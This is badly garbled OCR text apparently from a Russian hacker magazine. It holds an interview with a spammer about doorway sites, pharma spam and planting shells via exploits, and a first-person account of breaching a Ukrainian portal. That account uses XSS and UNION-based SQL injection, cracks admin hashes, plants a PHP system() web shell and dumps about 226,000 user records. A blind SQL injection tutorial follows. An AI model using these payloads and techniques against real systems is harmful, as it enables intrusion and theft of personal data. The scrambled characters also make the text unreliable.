ѵѵѵѵѵѵ. аШНаГесиЬе . сот — разносторонняя партнерская программа по 
популярным темам в интернете. 

зкорхші.сот — серьезная партнерка от Маизег’а по ювелирке, детоксам, 
чармсам, пирсингу и медицинским тестам. 

аШІіаЩ.сотй.сот — партнерка по продаже международных телефон- 
ных карточек (ркопе сагск, Геіеркопе сагск, са11іп§ сагск) . 



► 070 
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Приватный дорген гесІ.Вибоп 



Приватная спамилка 



ВЗЛОМ 




Вид — цена за клик 
в РРС. 

Фид — то место под 
твоим аккаунтом, 
куда переходит юзер 
с поисковика в РРС. 



Интервью 

Для того чтобы ты понял, как поднявшиеся люди рубят свои бабки, я 
представляю твоему вниманию интервью с одним из успешных сеош- 
ников — ехітіт. Понеслась :) . 

(Орфография и стилистика сохранены) 

Ма§ (с): 

Приветствую :). 
ехітіт: 

Привет. 

Ма§ (с): 

Как настроение? 
ехітіт: 

Наплывает потихоньку. . . Время сейчас хорошее :) . 

Ма§ (с): 

О, это хорошо :),ятутхотел немного тебя попытать на тему дорвееводс- 

тва, ты как? 

ехітіт: 

Ммм... Пытай... Только небольно... :) 

Ма§ (с): 

Ок :) . Как давно ты в теме? И как вообще пришел в ЗЕО? 
ехітіт: 

В теме я сравнительно недавно. . . Даже, так сказать, новичок в мире 
5ЕО. . . В тему пришел чуть больше полугода назад: подвернулась ссылка 
на сайт какого-то сеошника... Там было полное описание примитивных 
доров с фри-прогой для генерации и немного советов начинающему 
дорвейщику. . . Решил прочесть. . . 

Ма§ (с): 

Вот как все просто :) . Скажи, легко ли было начинать, какие встреча- 
лись препятствия на пути и какие проги предпочитаешь для ведения 
биза? 
ехітіт: 

Не поверишь. . . Я, как ребенок, спал и видел тысячи долларов на счету 
ѴѴеЬМопеу, но все круто обламывалось... В первый месяц я не заработал 
ни цента. . . Но, о боги, деньги пошли. . . за месяц я срубил 100 баков. . . 

Эти деньги и были для меня началом карьеры в СЕО. Я купил дорген. . . 
у уважаемого мной Ьеггѵіе (Чѵѵѵѵѵ.іеггѵіе.ги) . тогда это был форум-гене- 
ратор, ныне — геб.ВиІТоп. . . Автор не только помог мне настроить его, 
но и подсказал некоторые нюансы в СЕО. . . Далее я накупил доменов 
и начал спамить... Спамил руками на высокопиаристые ресурсы :) . 
Какие проги? Ну, как я уже сказал, дорген от Леззвия плюс самописная 
спамилка одного моего хорошего друга. И немного фантастики в виде 
высокопиаристых доменов... пробиться с новых доменов нереально. 
Ма§ (с): 

Ты думаешь, что нереально? А как же все эти рассказы про фарма-мага- 

зины и белую оптимизацию на фриварныххостингах? 

ехітіт: 

На новых доменах... Не, нереально... какой траст для них у поискови- 
ков? Это, как левый человек подойдет к тебе на улице и попросит поз- 



вонить мобилу с камерой :). Фарма-магазины... реальная тема... но там 
опять же нужен очень хороший платящий фарма-траф, я пока не готов 
уйти с РРС на сайнапы. . . Фриварные хостинга. . . ну, как бы так сказать. . . 
да, доры вылезают... но не все... нужно уметь их искать... Я предпочитаю 
кушать хлеб с красной икрой в виде шеллов к трастовым доменам : (. 

Ах да, ты про белую оптимизацию... «Нет, мама, это фантастика». Фанта- 
стика в плане того, что нужно убить не меньше года, для того чтобы рас- 
крутить белый проект хоть как-то. . . А тут через пару месяцев появится 
конкурент, которыйу тебя твой белый хлеб заберет. . . Я в это не верю. 
Ма§ (с): 

Интересно. . . . Расскажи, домены какого типа пользуются наибольшим 
трастом у Гугла и, как ты думаешь, какова судьба .еби в дальнейшем? 
Будут ли они еще пуще баниться? :) 
ехітіт: 

.еби уже отъездились... Гуглужене доверяет им так... Раньше народ 
делал тысячи баксов в день с едух. . . Сейчас тема с ними практически 
померла... Какого типа? Старые-старые домены с хорошим пр... и еще 
одно маленькое но (о нем не так хочется говорить. . .) . 

Ма& (с): 

Но нашим многоуважаемым читателям ты сможешь об этом но ска- 
зать? :) 
ехітіт: 

Понимаешь, алгоритмы меняются... Нужно просто следить и анализи- 
ровать.. . Тупо клепать доры и спамить их — с этого много не заработа- 
ешь... Тут все до мелочей: имя, возраст, страна... 

Ма§ (с): 

Ясно, подробности своего биза никто не хочет палить :) . Ну, надеюсь, 
и этой инфы будет достаточно. Скажи, а легко ли вообще добывать 
пиаристые домены, куда можно лить доры? 
ехітіт: 

Легко. . . по крайней мере, мне. . . Я не покупаю ничего. . . Я все делаю 
сам. . . Домен — дор — спам. Эксплойтами живет и процветает наша 
страна : (. 

Ма^ (с): 

А в какой области ты сам крутишься? Фарма, адалт? Спали несколько 

хороших кеев. 

ехітіт: 

Начинал с ад алта . . . Сейчас на фарме . . . Игатабоі, ѵіа§га, сіаііз : ) . 

Ма§ (с): 

Спасибо за ответы :) . И еще, если не секрет, сколько ты сейчас зараба- 
тываешь в месяц? 
ехітіт: 

Пока что Зк вялых енотов :) . 

Ма§ (с): 

Думаю, это будет хороший стимул для наших читателей. Не смею боль- 
ше тебя задерживать, огромный респект за интервью! :) 
ехітіт: 

Надеюсь, это интервью поможет паре дорвейщиков. Только не школь- 
ников-пятиклассников :) . Дети, таблетки — это не игрушки ! 

Ма§ (с): 

Я тоже на это надеюсь :) . 
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► 071 




ІЖГС.ЫЕТПОД- 
ХАКЕРСКИМ |1|М|||| 
КОЛПАКОМ МІ,ММІ 



ВЗЛОМ КРУПНОГО ИНТЕРНЕТ-ХОЛДИНГАІ 



Какое-то время назад я прочитал пафосную статью, в которой были названы крупней- 
шие интернет-холдинги Украины. В список входили такие конторы, как «Спутник-ме- 
диа» (известный в народе как Ві§тіг), «Укрнет» (икг.пеі), оЬох.иа (знакомый в первую 
очередь благодаря своей интернет-газете «Обозреватель»), а также «РБК-Украина» 
(гЪс.иа, иіго.иа). Все бы ничего, но в августовском номере «Хакера» была статья, посвя- 
щенная взлому «Бигмира», которая не оставила меня равнодушным, вдохновив на «под- 
виг». «Чем я хуже?» — подумал я и стал быстро разрабатывать план внедрения во второй 
по счету холдинг икг.пеК 



Н НА СТАРТ, ВНИМАНИЕ, МАРШ! 

Ущерб от взлома крупных холдинговых компаний оценивается в миллионы, 
а то и в десятки миллионов баксов (как это было с«Бигмиром»]. Поэтому 
хамить подобные организации — довольно рискованное занятие, ведь 
зачастую такие конторы не экономят на сисадминах, кодерах и, самое 
главное, юристах. 

Ладно, я не стану грузить тебя нотациями и перейду непосредственно копи- 
санию взлома. Но вначале скажу, что, ломая что-либо, я (да и вряд ли один я 
:)) всегда обращаюсьза помощью к Гуглу. И этот раз не стал исключением... 
Итак, я залез в мой любимый поисковик и вбил нехитрый запрос «зііе: 
икг.пеЬ>. Получив огромное количество страниц, я приступил к поиску 



интересных ответов. Сперва мой взор упал на сайт дІоЬе.икг.пеС 
но эксперименты с его контентом ничего не дали. Единственной 
победой была бесполезная Х55 ( бирѴ/аІоЬе.икг.пеІ:/ баіа ЬапсІІег. 
а5рх?са[[Ьаск=<М ^езЕс/іезіѴ Ш.[Соипігіе5&спі=соипігіе5 
таіпраае ]. Посмотрев несколько других сайтов от икг.пеС я нашел еще 
одну банальную Х55 на раусагсГикг.пе! (проект специально заточен 
под статистику трафика неудач ни ков-диалап щи ко в). ИЕІ- выглядел 
примерно так: 

кЩЬр: //раусагсі.икг . пеЦ : 8080/р1з/аЪз/ѵ7еЪ_ип. зкюѵ7?раде_п 

ате=<зсгір(:>а1егЦ ( ' Іоі ' ) ;</зсгірк>&1одпате=&сЛкзит= 
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Наглядный процесс брута хэшей 

Но меня не интересовали Х55, я хотел найти что-то более серьезное, 
вроде 5С1І_- инъекции или инклуда. А потому я вернулся в Гугл и сделал 
свой запрос более навороченным: «Пеіурефбр зііешкг.пеі іпигІ:ісІ=», что 
в переводе на русский означало: «Иди туда, не знаю куда, принеси то, не 
знаю что». Шутка. Аесли серьезно, переводбыл следующим: «Найти все 
ссылки в файлах с расширением рбр во всех доменах *.икг.пеІ, в которых 
встречается фраза ' і сі = ’ » . 

Удача не заставила себя ждать. В глаза практически сразу бросился линк 
ЬирУ/іоЬ.икг.пеі/ѵіеѵѵгез/ѵіеѵѵ ІРге5.рЬр?гіс1=450717 . Посмотрев на эту 
страницу повнимательнее, я догадался, что тут может быть 5СП_-инъект. 

Но сразу рваться в бой я не стал, а лишь попробовал добавить кзапросу 
« ». К моему удивлению, сервер в ответ ничего не выдал. Это означало, что 
либо скрипт беспощадно фильтровал значение переменной гісі, либо вывод 
ошибокбыл отключен. 

Но я не отчаивался — главное было зацепиться. Я подставил в переменную 
гісі значение450717+АЫО+1=1/* ( что всегда означаетлогическоеітие) и 
сравнил с результатом значения 45071 7+АІ\Ю+ 1=2/* (что всегда означает 
логическое івізе). Причем в первом случае ответбыл идентичен оригиналу 
[ І~іир://іоЬ.икг.пе1:/ѵіеѵѵге5/ѵіеѵѵ ІРге5.рЬр?гіс1=45071 7 ]. Это доказывало факт 
наличия инъекции. 

Сразу же после моего очередного открытия я приступил к подбору числа ко- 
лонок. Ситуацию омрачал тот факт, что вывод ошибокбыл отключен. Таким 
образом, пришлось все делать вручную, а не с помощью скриптов. 

Через несколько минутя получил то, что хотел, — колонококазалосьзначи- 
тельное количество, аж37 штук. Конечный ІІРІ_ выглядел так: 

ГЩСр: //зоЬ.икг .пеб/ѵіеѵ\7гез/ѵіеѵ7_ІБгез .рЪр?гісі=- 
1+ШІОЫ+ЗЕЬЕСТ+1 ,2,3,4,5,6,7,8,9,10,11,12,13,14,15 
,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 
2,33,34,35,36,37/* 

Ксчастью, вывод данных присутствовал, ия могполучить всезначения 
таблиц. Первое, что я попробовал сделать, — это вывести поля с тузці.изег, 
но обломался — доступа не было. 

Подставив на место 1 9-й колонки конструкцию «сопсаІ_ѵѵ5(сбаг(59),ѵег5 
іопО.изегШ», я узнал, что функция ѵегзіопО возвратила значение 5.0.24а 
(версия МуЗСи, а функция изег() вернула рЬизегЙЬозІІ 5 (имя пользовате- 
ля музеи. 

^ ЛЮБИМЫЙ МѴ5СП.5 

Так как СУБД была из пятой ветки, я могвывести информацию изтаблички 
ІІ\ІР0ПМАТЮІ\І_5СНЕМА, а это значило, что мне не придется подбирать 
название таблиц/колонок. А это уже очень круто! 

Итак, уже через 5 минуту меня был огромный списоктаблиц (состоящий 
из 225 штук). Быстро просмотрев его, я обратил вниманиетолько натри: 
тетЬегз, \л/р2_изегз, ѵѵр_изегз. Но для уверенности, что в таблицах со- 
держатся конфиденциальные данные юзеров, я инжектировал следующий 
запрос: 
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Главная страница пораженного портала 

ЗЕЬЕСТ СаЫе_паше РКОМ іпбогша1:іоп_зс]іета . соіитпз МНЕКЕ 
іпГогта1:іоп_зс]іета . соіитпз . со1итп_пате ЫКЕ ' %разз% ' ; 

В ответ на этотфинтмне вывелись все те же таблицы (их полный списокты 
можешь найти на нашем ОѴР), что не могло не радовать. Исходя из назва- 
ний некоторыхтабличек(ѵѵр2_и5ег5,ѵѵр_и5ег5), можно было догадаться, что 
это Ѵ\/огсІРге55 (далее ѴѴР). 

Чуть позже яузнал названия колонокобоихтаблиц. Получив данные 
изѵѵр2_изегз и ѵѵр_изегз, я обратил внимание на даты регистраций (в 
\л/р2_изегз — шесть юзеров, \л/р_изегз — восемь) и понял, что ѵѵр2_изегз 
содержала более новые регистрации, в связи с чем хэши из нее и полетели 
в любимый РаззѵѵогсІзРго. 

Спустя 2-3 минуты после старта брута я расшифровал ровно половину 
хэшей: 

1одіп:тс15 (разз) :разз 

сігоп : 698с151а19с18а121се581499с17Ъ701668 : 111 
ргасЪ: 61731аее5Ъ7Ь352ссс19Ь75ссІЪ5сІ0сЮ81 :ргасЬ 
соѵег : 7 694Г4а66316е53с8сс1(39(!9954Ъс1611с1: ч 

Воттакие смешные пароли ставят админы натаких огромных сайтах, как 
икг.пеГ 

Сам движокѴѴР висел на ЬНрУ/іоЬ.икг.пеі/пеѵѵз . Получив реальные пароли, 
я пошел в атаку. Панель администрирования располагалась по адресу 
ЬирУ/іоЬ.икг.пеі/пеѵѵз/ѵѵр-Іоаіп.рЬр . куда я и направил свой браузер. 

0 НА ПОЛПУТИ КУСПЕХУ 

Так я стал админом! Теперь я мог создавать, редактировать и уда- 
лять новости, но мне этого было мало. Как известно, в ѴѴР без труда 
можно получить шелл с помощью редактора шаблонов, переписав 
РНР-файл, входящий в состав шаблона. Это я и сделал. Как? Сейчас 
объясню. 

Сначала я вписал в іпсіех . рЬр (так назывался имеющийся в движке РНР- 
файл) стандартный однострочный шелл типа: 

<?іб (іззек ($_СЕТ [ ' стсР ] ) {зузбет ( $_СЕТ [ ' стсР ]);}?>, 

Затем зашел по урлу ЬирѴ/іоЬ.икг.пеі/пеѵѵз/ѵѵр-сопіепіЛЬетез/ 
зітріаі/іпсіех .рЬр?стсІ=ісІ . но, к своему сожалению, не получил ника- 
кого результата :(. 

Но я не отчаялся, а решил залить полноценный многофункциональный 
шелл, работающий через орепсі і г() . На удивление, получилось, и пере- 
до мной предстал списокфайлов, данные о системе и... предательский 
за{е_тосі :(. Из-за него мои права были сильноурезаны, и потому я не 
получил никаких привилегий в системе. Мне даже неудавалось прочитать 
/еіс/раззѵѵсі, что очень огорчало. 

Не падая духом, я начал искать конфиги — это, несмотря на за^тосі, я мог 
делать. Прочитав/ѵаг/ѵѵѵѵм/щЬ/сопГд.рЬр, я увидел логин/пароль от БД: 




>> 



взлом 



к 




Контент в удобочитаемом формате 



Р5Т-Му50І_. Без комментариев 










> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомле- 
ния! Ни автор, ни 
редакция за твои 
действия ответст- 
венности не несут! 



СОДЕРЖИМОЕ/ѴАР/ѴѴѴѴШОВ/СОМРІО.РНР 

<?р1ір 

// БаСаЪазе соппесДіоп 
$сІЪ_ДовЪ - "ІосаІІіозЬ" ; 

$(5Ь_паше = "а^оЬ"; 

$с!Ь_1одіп = "акеііа"; 

$с!Ъ_разз = "аііека"; 

# есЬо 1 ЬеЬеЬе 1 ; 

// ЕзбаЫізЬшепД 
$с!Ь_1іпк = тузд1_соппесі: ( 

$сЗЬ_1іозЬ , $сіЪ_1одіп, $сіЪ_разз) ; 
$(5Ь_зе1ескед = тузд1_5е1ес1:_(ЭЬ( 

$ сіЪ_пате , $ сіЬ_1 іпк ) ; 

// БізаЫе еггогз 
еггог_герогДіпд ( 

Е_АЬЬ Л Е_ѴШШШО л Е_ГОИСЕ) ; 



Но, как назло, логин и пасс не подходили. И мне предстоя- 
ло выяснить почему. Для исправления ситуации, я решил 
посмотреть другой конфиг — /ѵаг/ѵѵѵѵѵѵ/іоЬ/пеѵѵз/сопбд.рЬр . 
но и там пароля не оказалось. Но внимательнее посмотрев, я 
обнаружил, что он инклудил в себетретий конфиг: 

СОДЕРЖИМОЕ 

/ѴАР/МЛЛМ/_І0В/СІ_А55Е5/МѴ5СІІ_.С0МРІ6.РНР 

<?рЪр 

сіазз тузд1_іпі{ 

ѵаг $1юзД = "10.60.20.12"; 

//ѵаг $1юзД = "ІосаІЬозЬ" ; 
ѵаг $сЗЬ= " ^ оЬ_пеѵ73 " ; 
ѵаг $1одіп = "пеѵлзтазД " ; 

# ѵаг $изег = "зоЬизег"; 

ѵаг $разз = "гЪбсІІ; д , " ; 

} 



# 



?> 



// Іпсіизіоп раДк 
іпі_зеб ( ' іпс1исіе_ра!:1і ' , 

' /ѵаг /тт/икг . пеб ' ) ; 



Я тутже попробовал приконнектиться к БД следующим 

ЛИНКОМ: 



?> 

Здесь мне повезло — в конфиге оказались реальные логин/па- 
роль от БД. Надо отметить, что этот конфиг распространялся на 
все сервисы домена іоЬ.икг.пеБ 
Я прицепился кСУБДлинком: 



кССр : / / д оЪ . икг . пек /пеѵлз /ѵтр-сопДепД /Ыіетез / 
зітріаі/здісіитр .р1ір?з=у&1одіп=аке11а&:раззѵ7СІ= 
аке11а&зегѵег=1оса1Ъоз1:&рог1:=3306 



кД Ср : / / д оЪ . икг . пеД /пеѵ^з /ѵф-сопкепД / ДЬетез / 
з ітр 1 а 1 / з ді сіитр . ркр ? з =у & 1 од іп= д оЬи з ег &ра з з ѵгсі. 
=гЪбс11 ; д , &зегѵег=10 .60.20. 12&рогЬ=33 06&сІЪ=ад 
оЪ&бЫ =тетЬег з & 1 іті б_з Ь аг Д = 0 & 1 іті Д_соип1: = 5 




Затем слил базу с юзерами — тетЬегз (226131 юзеров) и базу 
работодателей — адепсу (-550 юзеров), после чего благопо- 
лучно удалился :). 

В НАРРУЕИй 

Всю следующую ночь меня мучили кошмары, будто я сижу 
в СИЗО и подвергаюсь ежедневным пыткам. Проснувшись 
утром в холодном поту, я набрался смелости и позвонил в 
техподдержку икг. пек чтобы сообщить им, что безопасность их 
ресурсов оставляет желать лучшего. Как и прогнозировалось, 
уже назавтра баг прикрыли, а мои шеллы удалили. 

Я не поленился и снова залил шелл через админку (благо 
пароли остались прежними :)). Но обломался — ѴѴР переус- 
тановили в другую папку, а администратор усилил настройки 
АрасЬе. Файлы ЬНр://)оЬ.икг.пеІ уже находились в /ѵаг/ѵѵѵѵѵѵ/ 
)оЬ/. а Ьир://|оЬ.икг.пе1 — в/ѵагДл/ѵѵѵѵ/рЬпеѵѵБ. Поскольку все 
базы мирно покоились на моем винте, я не стал заново рас- 
кручивать баг, оставив ситуацию на совести админов. □с 
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ІЕВГЕНИЙ «ОЕМАОІ.АВІМ» МИНАЕВІ 



ИНЪЕКЦИИ 



ВСЛЕПУЮ 



ЭКЗОТИЧЕСКОЕ ИНЖЕКТИРОВАНИЕ ГРУБЫМ МЕТОДОМ 



взлом 



/ СЕМДСЬДВШ@АЫТІСНДТ.Ви / 



При проведении атаки вида 5(^]_,-іп]ес1:іоп далеко не всегда помогает оператор ІШІСЖ. 

В этом случае единственный способ получения информации из таблиц БД — посимволь- 
ный перебор данных. Надо сказать, что этот способ является одинаково эффективным 
и универсальным для всех ЗС^Б-операторов. Чтобы ты не сомневался в моей правоте, я 
прямо сейчас на примере конкретных запросов покажу, как быстро и грамотно осущест- 
вляется перебор с дальнейшим получением ценной информации. 



Н ТАКИЕ НЕЗАМЕТНЫЕ ИНЪЕКЦИИ 

Не всегда при проведении 50І_-инъекций можно воспользоваться опера- 
тором ІЛ\ІЮІ\І, итогда единственный способ получить ценную информацию 
изтаблиц — посимвольный перебор данных. Да, метод грубый, но зато 
универсальный для всех 50І_-операторов, будьто ІІРОАТЕ, 5ЕТ, 0Е1_ЕТЕ или 
ІЫ5ЕРТ. Ведь даже после модификации данных, поступивших в таблицу, 
результат нас не всегда будет устраивать ввиду ее неидеальной структуры. 
Разъясню некоторые теоретические азы Му50І_. А если ты их уже постиг 
— оченьхорошо, повторение — мать учения. 



0 ПОЛЕЗНЫЕ ФУНКЦИИ МѴ50І- 

Рассмотрим ряд функций, которые упрощают жизнь как программисту, 
составляющему запросы в скриптах, так и хакеру, который ищетизъяны в 
таких запросах :). Давай условимся, что для простоты восприятия в качест- 
ве примеров я буду публиковать запросы в чистом виде, а после стрелочки 
(->) указывать результат их выполнения. 

1 . А5СІ I (5ТРІ N0) — очень простая функция: она возвращает числовое 
значение первого символа строки или ноль, в случае если строка является 
пустой. Ввиду ограниченности типа 5ТРІЫ6 функция возвращаетчисло в 
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диапазоне от 0 до 255. Например: 

ЗЕЬЕСТ АЗСІІ ( 1 ) -> 49 
ЗЕЬЕСТ АЗСІІ ( 7 1 7 ) -> 49 
ЗЕЬЕСТ АЗСІІ ( 'а' ) -> 97 
ЗЕЬЕСТ АЗСІІ ( 7 аа 7 ) -> 97 

2. 0К0(5ТРІ N0) — возвращает код первого символа строки -аргумента. 

ЗЕЬЕСТ ОКБ ( 1 ) -> 49 
ЗЕЬЕСТ ОВЬ( 7 1 7 ) -> 49 
ЗЕЬЕСТ ОВЬ ( 7 а 7 ) -> 97 
ЗЕЬЕСТ ОВЬ ( 7 аа ' ) -> 97 

З.ВЕТѴѴЕЕЫ М I N АЫР МАХ. Если выражение больше или равно М I N и меньше 
или равно МАХ, то ВЕТѴѴЕЕЫО возвратит 1 , иначе результат будет нулевым. 
Если все элементы однотипны (и, кпримеру, имеютчисловойтип],то срав- 
нительный запрос сводится к выражению «М I N <=011ЕВУАЫВ ОІЧЕНУ <= 
МАХ». Примечательно, но до Му5СН_4.0.5 в результате сравнения неодно- 
типных данных получается следующее: 

ЗЕЬЕСТ 5 ВЕТШЕЫ 1 АЫБ б -> 1 
ЗЕЬЕСТ 5 ВЕТШЕЫ 7 1 7 АЫБ '6' -> 1 
ЗЕЬЕСТ 5 ВЕТШЕЫ 1 АЫБ 4 -> О 
ЗЕЬЕСТ 5 ВЕТШЕЫ 7 1 ' АЫБ '4' -> О 

То есть Му5СИ_ пытается сделать тип общим! Это нам только на руку. Почему? 
Терпение, мой друг, узнаешь чуть позже :). 

4. 1 N (ѴАЕІЭ Е 1 , ѴАШЕ2) — возвращает 1 , если запрос равен одному из 
значений, лежащих в I N () . В противном случае вернет 0. Если все значения 
являются константами, они чувствительны к регистру и обрабатываются 
в соответствии стипом запроса, а затем сортируются методом бинарных 
деревьев. То есть запрос выполнится максимально быстро, если все пере- 
менные однотипны. 

ЗЕЬЕСТ 1 Ш (2,3, 4,5,1) -> 1 
ЗЕЬЕСТ 1IN(2,3,4 / 5, , 1 , ) -> 1 
ЗЕЬЕСТ 1 Ш (2,3, 4,5,0) -> 0 
ЗЕЬЕСТ 1 Ш (2, 3,4,5, '0') ->0 

5. 1_0ѴѴЕН(5ТРІМѲ) — приводит строку к нижнему регистру в соответствии с 
текущим набором символов (поумолчанию 150-8859-1). 

ЗЕЬЕСТ ЬОШВ( 7 ІТЬЕЕЕЫСЕ 7 ) -> іМеТепсе 
ЗЕЬЕСТ ЬОШВ( 7 ІТЬЕЕеЫСЕ 7 ) -> ШйеТепсе 
ЗЕЬЕСТ ЬОШВ( 7 іЬсЗеТепсе 7 ) -> іЬсіеТепсе 
ЗЕЬЕСТ ЬОШВ ( 123 ) -> 123 




1111118 

6. 51Э В5ТРІ Ы0(5ТРІ N0, Р05ІТІ0Ы , ЕЕЫ0ТН) — копирует подстроку из строки 
5ТВІЫ6 с позиции Р05ІТЮЫ длиной І_ЕЫ6ТН. 

ЗЕЬЕСТ зиВ5ТВШС( 7 іЬсІеТепсе ' ,4) -> ебепсе 
ЗЕЬЕСТ ЗІЛЗЗТВШС( 7 ШйеТепсе 7 ЕВОМ 4) -> ебепсе 
ЗЕЬЕСТ ЗЬВЗТВШС ( 7 ШйеТепсе ',4,2) -> еТ 
ЗЕЬЕСТ ЗЬВЗТВШС ( 7 іЬсіеТепсе 7 , 1 , 2 ) -> ІЬ 

7. 50В5ТВІМ6_ІМ0ЕХ(5ТРІМ6,0ЕиМІТЕР,ЕЕМ6ТН)-возвращаетподстро- 
ку строки 5ТРІЫ6 до позиции І_ЕЫ6ТН после разделителя 0ЕЫМ1ТЕР. Если 
значение І_ЕЫ6ТН положительное, возвращается все, что лежит слева от 
ОЕиМІТЕР, если отрицательное — все, что справа. 

ЗЕЬЕСТ ЗЬВЗТВШС_ШВЕХ ( ' іСсіеТепсе . ги 7 , 7 . 7 ,2) -> 
ібсЗебепсе . ги 

ЗЕЬЕСТ ЗЬВЗТВШС.ШБЕХ ( 7 Икіебепсе . ги 7 , 7 . 7 ,-1) -> ги 
ЗЕЬЕСТ ЗЬВЗТВШС.ШБЕХ ( 7 іЬйебепсе . ги 7 , 7 . 7 , 1 ) -> 
іЬсЗебепсе 

8. ВЕМСНМАРК(С0иМТ,ЕІІМСТІ0Ы) — выполняетСОШЧТ раз функцию 
РІЛЧСТІОМ, создана для тестирования запросов на предметзагрузки сер- 
вера. 

ЗЕЬЕСТ ВЕЫСНМАВК (31337, ЕЫСОБЕ ( 7 зкѵог 7 , 7 поу 7 ) ) 

^ ПОДЗАПРОСЫ, С ЧЕМ ИХ ЕДЯТ 

Нередко для проведения 5СН_-атактебе может понадобиться помощь 
вложенных подзапросов. Чтобы понять, как они устроены, я в качестве 
примера рассмотрю Му5СП_ѵ. > 4.1 . Именно с этой версии поддерживаются 
все формы подзапросов, которых требует ста ндарт5СІІ_. Подзапрос можно 
вкладывать в родительский запрос (или даже подзапрос), предварительно 
обрамив его скобами: 

ЗЕЬЕСТ * ЕВОМ 'изегз 7 ШЕВЕ 7 ісі 7 = (ЗЕЬЕСТ МАХ ( ІБ) ЕВОМ 
7 изегз 7 ) 

ЗЕЬЕСТ * ЕВОМ 'изегз 7 ШЕВЕ 7 ісі 7 = АЫУ ( ЗЕЬЕСТ МАХ ( ісЗ.) 
ЕВОМ 'изегз 7 ) 

ЗЕЬЕСТ * ЕВОМ 'изегз 7 ШЕВЕ (1,1) = (ЗЕЬЕСТ 
7 ісЗ 7 , 'изегпаше 7 ЕВОМ 'изегз') 

При использовании подзапросов могут неожиданно встретиться следующие 
ошибки: 

1. Неподдерживаемый синтаксис, или «1235 — ТЫзѵегзіоп о( МуЗОІ-СІоезпЧ 
уе^зиррогі: ‘ЫМІТ & ІМ/АІ_І_/АІ\ІѴ/50МЕ БиЬриегуѴ 
Такая ошибка может возникнуть при запросе вида: 

ЗЕЬЕСТ * ЕВОМ 'изегз 7 ШЕВЕ 7 ісі 7 Ш (ЗЕЬЕСТ 7 ісі 7 ЕВОМ 
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ЦрЬ -инъекция в гипстз 



'изегз ' ОЕБЕЕ ВУ 'ій' ЫМІТ 1) 

Она обуславливается старой версией МуЗОБ. С помощью такой хитрой 
подставы ты сможешь определить версию ветки СУБД. 

2. Неверное число столбцов в подзапросе, или «1241 — Орегапб зЬоиШ 
сопіаіп 1 соІитпЫ». Возникаетпри запросе: 

ЗЕЬЕСТ (ЗЕЬЕСТ ' ісЗ. ' , 'изегпаше' РВОМ 'изегз') РВОМ 
'изегз ' 

3. Неверное количество строк в подзапросе, или «1242 — БиЬциегу геіигпз 
тоге іНап 1 гоѵу» : 

ЗЕЬЕСТ ій' РВОМ 'изегз' ШЕВЕ 'ій' = (ЗЕЬЕСТ ій РВОМ 
'изегз ' ) 

^ І.ЕГ5 00ІТ! 

Теперь, когда мы знакомы стеорией, и в частности с синтаксисом подзапро- 
сов (это очень важно], перейдем кделу. Предположим, что мы отыскали на 
просторах интернета бажный скрипт (неудивительно, поскольку в инете 
таких скриптов пруд пруди). Предположим, что сценарию передается 
параметр ісі, фильтрация которого напрочь отсутствует. Если в этом случае 
мы подставим одинарную кавычку в значение параметра: «5ЕБЕСТ * ЕРОМ 
‘изегз’ ѴѴНЕРЕ ‘ісГ=”’»,то получим мерзкую ошибку в ответ: 

'Уои Ьаѵе ап еггог іп уоиг 8<2Ь зупЬах; сЬеск Ыіе шапиаі 
ЫіаЬ соггезропйз Бо уоиг МуЗ<2Ь зегѵег ѵегзіоп бог Ыіе 
гідЪБ зупБах Со изе пеаг ' ' ' ' ' аС Ііпе 1 . 

Знакомо? Несомненно. Бьюсь об заклад, что таких ошибок в своей 
хакерской жизни ты повидал немало. Попробуем умеючи раскрутить эту 
инъекцию безучастия ЕІЫІОЫ. 

Теоретически мы можем самостоятельно завершить запрос, подставив 
кавычку и знак комментария. Сразу замечаем, что изначально в МуЗОБ 
поддерживаются только три типа комментариев: 

1. Многострочный «/* */». 

2. Однострочный «#» . 

3. Еще один однострочный «--» (для совместимости с языком 
ЗОЬ) , после которого обязательно должен идти пробел либо 
символ перевода строки . 

Я буду использовать последний тип комментариев. Посмотрим, как поведет 
себя МуЗОБ при пережевывании моего коммента: 

ЗЕЬЕСТ * РЕОМ 'изегз' ШЕЕЕ 'ій' = '0' > О 

ЗЕЬЕСТ * РЕОМ 'изегз' ѴШЕКЕ 'ІЙ' = '1' > 1 

Так как непосредственно вывода данных мы не имеем (незабываем, что на 
экране отображается лишь ЗОБ-ошибка], осуществим перебор всех сим- 
волов строки, параллельно сравнивая каждый символ с его АЗСІІ-кодом. 



Вспомним функцию А5СІІ и рассмотрим следующие запросы: 



ЗЕЬЕСТ * 
> 1 


РЕОМ 


'изегз ' 


ШЕЕЕ 


'ІЙ' = 


'0' 


ОЕ АЗСІІ (1) =49-- 


ЗЕЬЕСТ * 
> 0 


РЕОМ 


'изегз ' 


ШЕЕЕ 


'ІЙ' = 


'0' 


ОЕ АЗСІІ (1) =40-- 


ЗЕЬЕСТ * 
- -> 1 


РЕОМ 


'изегз ' 


ШЕЕЕ 


' ІЙ' = 


'1' 


АШЭ АЗСІІ (1) =49- 


ЗЕЬЕСТ * 
- -> 0 


ЕЕОМ 


'изегз ' 


ШЕЕЕ 


'ісГ = 


' 1 ' 


АШЭ АЗСІІ (1) =48- 



Оператор АЫБ надо использовать в том случае, если первоеусловие 
запроса вернет нам хоть какой-то результат. В противном случае запрос 
остановится на первомусловии, недойдя до второго. АОВ мы можем смело 
использовать, если первоеусловие нашего запроса не возвращает никако- 
го результата. 

Способ сравнения для настоже имеетзначение, ведь запрос с однотипны- 
ми данными займет куда меньше времени, нежели со значениями разных 
типов (втаком случае сервер будет сам приводить их кединомутипу, жутко 
матерясь и кушая процессорное время :)). Для оптимизации задачи вспом- 
ним возможныетипы сравнения в МуЗОБ. 

Равенство: = 

Безопасное с точки зрения сравнения с ЖІЬЬ равенство: <=> 
Неравенства: о != 

Меньше и больше : < > 

Меньше или равно и больше или равно: <= => 

Сравнение с ШЬЬ: 13 ШЬЬ , 13 КГОТ ШЬЬ . 

Для реализации успешного перебора необходимо копировать каждый 
символ искомой строки с помощью функции 5БІВ5ТРІЫ6, сравнивая его 
сначала с нулем, а затем с набором АЗСІІ-кодов нужного типа данных. 
Узнать необходимый код можно с помощью РНР-функции 0РБ(). 

Перейдем к практике и заодно вернемся к нашему примеру. Предположим, 
что в искомой таблице ’изегз’ существует поле раззѵѵогсі, которое содержит 
данные в формате Мй5 (что, кстати, часто встречается в различных СМ3 и 
